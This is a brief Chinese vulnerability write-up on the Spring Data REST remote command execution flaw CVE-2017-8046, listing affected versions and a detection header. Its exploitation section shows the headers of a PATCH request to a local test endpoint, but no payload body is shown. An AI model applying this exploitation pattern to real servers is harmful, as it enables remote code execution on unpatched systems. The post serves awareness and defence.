Spring Data漏洞,Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons 是 Spring Data 下所有子项目共享的基础框架。

(CVE-2017-8046)Spring Data Rest 远程命令执行漏洞
影响范围PivotalSpringDataREST2.5.12 之前的版本,2.6.7 之前的版本,3.0RC3 之前的版本
SpringBoot2.0.0M4 之前版本
SpringDataKay-RC3 之前的版本
参考文章

http://www.code2sec.com/cve-2017-8046-spring-data-restming-ling-zhi-xing-lou-dong.html

特征header 头是 Content-Type: application/hal+json;charset=UTF-8

Spring Data漏洞利用

PATCH http://localhost:18080/customers/1 HTTP/1.1
Host: localhost:18080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 193

spring框架漏洞整理(Spring Data漏洞)相关推荐

  1. 【Spring框架一】——Spring框架简介

    系列文章目录 Spring框架简介 系列文章目录 前言 一.什么是Spring框架? 二.Spring框架的优势 1.简化开发流程:Spring提供了许多现成的功能,可以使得开发人员在构建应用程序时减 ...

  2. 从头开始实现一个小型spring框架——手写Spring之集成Tomcat服务器

    手写Spring之集成Tomcat与Servlet 写在前面 一.Web服务模型及servlet 1.1 Web服务器 1.2 请求流程 二.实现 三.小结 写在前面 最近学习了一下spring的相关 ...

  3. CNCERT:关于Spring框架存在远程命令执行漏洞的安全公告

    安全公告编号:CNTA-2022-0009 2022年3月30日,国家信息安全漏洞共享平台(CNVD)收录了Spring框架远程命令执行漏洞(CNVD-2022-23942).攻击者利用该漏洞,可在未 ...

  4. spring框架aop_使用Spring框架和AOP进行动态路由

    spring框架aop 本文的总体思路是展示业务交易如何动态触发业务事件以进行子系统处理. 本文显示的示例有效地使用了Spring框架2.0和Spring AOP来将业务服务与子系统处理功能分离. 现 ...

  5. spring框架学习 - 使用 Spring 的面向切面编程

    接上一篇博客:https://blog.csdn.net/qq_43605444/article/details/122029896?spm=1001.2014.3001.5502 七.使用 Spri ...

  6. spring框架学习 - 使用 Spring 的面向切面编程 补充1

    接上一篇博客:https://blog.csdn.net/qq_43605444/article/details/122050740?spm=1001.2014.3001.5502 6.选择要使用的 ...

  7. 【Spring框架家族】Spring Cloud Eureka 之常用配置解析(转载)

    1. 配置项解析 1.1 通用配置 # 应用名称,将会显示在Eureka界面的应用名称列 spring.application.name=config-service# 应用端口,Eureka服务端默 ...

  8. spring框架学习 - 使用 Spring 的面向切面编程补充

    接上一篇博客:https://blog.csdn.net/qq_43605444/article/details/122047698?spm=1001.2014.3001.5502 4.4 声明通知 ...

  9. 【spring框架28】spring之packagesToScan

    spring的spring.jar的jar包内,在org.springframework.orm.hibernate3.annotation下,有一个AnnotationSessionFactoryB ...

最新文章

  1. 科沃斯擦窗机器人擦不干净怎么办_家用自动擦玻璃机器人哪种好呢?玻妞和科沃斯擦窗机器人能干净吗...
  2. 《计算机网络》实验报告——常用网络命令
  3. linux静态分配设备号,Linux驱动开发之静态申请设备号
  4. Java中加减乘除怎样写代码,【求助】怎样实现加减乘除 代码如下
  5. NLog日志写文件的一个性能问题
  6. vue --- 购物车页面
  7. java 框架 例子_如何设计Java框架? –一个简单的例子
  8. mysql怎么看实例名_南方“中看不中吃”的前4名水果,莲雾只是垫底,你怎么看?...
  9. 如何对聚类结果进行分析_如何更合理地给聚类结果贴标签——由一个挖掘学生用户的项目说开去...
  10. php获取两个字符,php获取两个字符串之间的子字符串
  11. Illustrator 教程,如何在 Illustrator 中连接路径?
  12. Selenium爬虫 -- 无界面爬取:无头模式及其他参数
  13. 编写高质量java代码_编写高质量的Java代码
  14. Parse分析之 -- Enum.Parse
  15. php以大写字母分割,js按大写字母拆分字符串
  16. Legend of Mir(传奇)官方源码学习3、服务端程序初始化过程
  17. CNTV的点播调度方式
  18. varnish---vcl语法
  19. C# eval()函数浅谈
  20. cuda 的driver API 和 runtime API

热门文章

  1. 【经典算法】N002:排序三剑客
  2. 基于springboot的智慧养老平台设计与实现-计算机毕业设计源码和LW文档
  3. 小程序实现人脸取景框摄像-uniapp版
  4. PHP类的属性不能被赋值为变量的原因
  5. leetcode5465
  6. 红杉资本张帆:钟情本土创投的华尔街猎手
  7. 2022.03.27网易算法第一题
  8. Ptrade量化是模拟还是实盘?
  9. 像蚂蚁一样工作,像蝴蝶一样生活
  10. 你不得不知道的人脸识别「背后的故事」